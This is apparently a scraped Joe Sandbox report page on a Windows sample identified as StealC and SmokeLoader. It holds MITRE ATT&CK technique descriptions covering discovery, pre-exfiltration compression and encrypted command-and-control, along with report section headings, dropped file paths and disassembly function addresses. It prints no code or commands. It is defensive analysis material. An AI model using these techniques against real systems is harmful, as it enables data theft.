Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report oZB7n3wuNk.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: SmokeLoader

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fe8167436d6db6c6d2c4bed5d6f2d2c06e142845_f78a65ed_2f8ce52e-7594-4f7d-b0c6-0e1b9b636e3e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE42E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9CD.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9FD.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001d.db

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001e.db

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\Windows[1].json

C:\Users\user\AppData\Local\Temp\9A25.exe

C:\Users\user\AppData\Local\Temp\svchost015.exe

C:\Users\user\AppData\Roaming\birajci

C:\Users\user\AppData\Roaming\birajci:Zone.Identifier

Static File Info

General

Windows Analysis Report
oZB7n3wuNk.exe

Function 00401476 Relevance: 10.7, APIs: 7, Instructions: 228
nativeCOMMON

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Function 004014AA Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 004014B1 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Function 004014AD Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Function 004014D5 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Function 00402F55 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 0064AC68 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 004030B2 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre